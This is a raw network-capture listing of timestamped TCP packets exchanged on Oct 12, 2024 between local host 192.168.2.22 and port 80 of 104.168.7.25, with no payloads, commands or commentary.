                                                                Oct 12, 2024 16:39:57.617733955 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617743015 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617757082 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617768049 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617770910 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617785931 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617798090 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617814064 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617820978 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617830992 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617831945 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617847919 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617860079 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617873907 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617873907 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617891073 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617901087 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617914915 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617918968 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617930889 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617938995 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617949009 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617960930 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617964983 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617976904 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.617989063 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.617990017 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618005991 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618006945 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618024111 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618036032 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618038893 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618052959 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618056059 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618069887 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618071079 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618083954 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618088961 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618098974 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618104935 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618118048 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618122101 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618139982 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618143082 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618156910 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618170023 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618174076 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618181944 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618190050 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618206024 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618208885 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618217945 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618237972 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618244886 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618253946 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618262053 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618277073 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618294001 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618302107 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618310928 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618316889 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618319988 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618335962 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618343115 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618352890 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618361950 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618381023 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618402958 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618406057 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618421078 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618437052 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618453026 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618465900 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618474960 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618495941 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618515015 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618530989 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618546009 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618577957 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618587017 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618747950 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618767977 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618792057 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618798018 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618805885 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618808985 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618825912 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618834019 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618840933 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618844032 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618858099 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618858099 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618875027 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618879080 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618886948 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618891954 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618906975 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618920088 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618923903 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618938923 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618942022 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618953943 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618958950 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618968964 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.618974924 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.618989944 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619000912 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619000912 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619005919 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619033098 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619033098 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619048119 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619048119 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619076014 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619090080 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619091034 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619107962 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619115114 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619133949 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619141102 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619141102 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619151115 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619165897 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619168997 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619184017 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619193077 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619199038 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619214058 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619216919 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619224072 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619230032 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619250059 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619251966 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619268894 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619281054 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619282007 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619283915 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619307041 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619316101 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619323969 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619323969 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619349003 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619349957 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619366884 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619376898 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619393110 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619415045 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619415045 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619452000 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619471073 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619482994 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619524002 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619533062 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619541883 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619566917 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619580984 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619580984 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619600058 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619609118 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619616032 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619632959 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619648933 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.619677067 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619677067 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619677067 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619677067 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619713068 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.619889975 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.674490929 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.674509048 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.674525976 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.674540997 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.674556017 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.674562931 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.674577951 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.674578905 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.674588919 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.674607992 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.674616098 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707159996 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707190037 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707205057 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707259893 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707274914 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707289934 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707299948 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707300901 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707304955 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707313061 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707348108 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707348108 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707412958 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707428932 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707443953 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707458973 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707479954 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707480907 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707493067 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707496881 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707503080 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707514048 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707529068 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707542896 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707544088 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707556963 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707567930 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707576036 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707581043 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707596064 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707602978 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707619905 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707629919 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707636118 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707650900 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707655907 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707665920 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707673073 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707691908 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707700968 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707700968 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707707882 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707724094 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707731009 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707740068 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707758904 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707762957 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707775116 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707781076 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707783937 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707796097 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707807064 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707812071 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707820892 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707828999 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707837105 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707844973 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707855940 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707860947 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707870007 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707875967 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707889080 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707902908 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707911968 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707921028 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707926035 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707942009 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707957029 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707957983 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707973957 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.707979918 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707979918 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707981110 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.707988977 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708004951 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708005905 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708017111 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708020926 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708034039 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708038092 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708050966 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708051920 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708058119 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708076954 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708079100 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708093882 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708108902 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708118916 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708118916 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708125114 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708137035 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708142042 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708158970 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708165884 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708165884 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708178043 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708211899 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708245993 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708261013 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708275080 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708290100 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708292961 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708301067 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708304882 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708321095 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708322048 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708336115 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708342075 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708352089 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708364964 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708373070 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708380938 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708388090 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708395958 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708411932 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708420038 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708425999 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708435059 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708436012 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708441973 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708458900 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708472967 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708481073 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708487988 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708499908 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708503962 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708518028 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708520889 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708533049 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708537102 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708544970 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708554983 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708564043 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708570004 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708580971 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708585978 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708600044 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708604097 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708610058 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708630085 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708637953 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708703995 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708868980 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708892107 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708906889 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708920956 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708929062 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708936930 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708937883 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708962917 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708970070 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.708981991 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.708986044 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709011078 CEST8049170104.168.7.25192.168.2.22
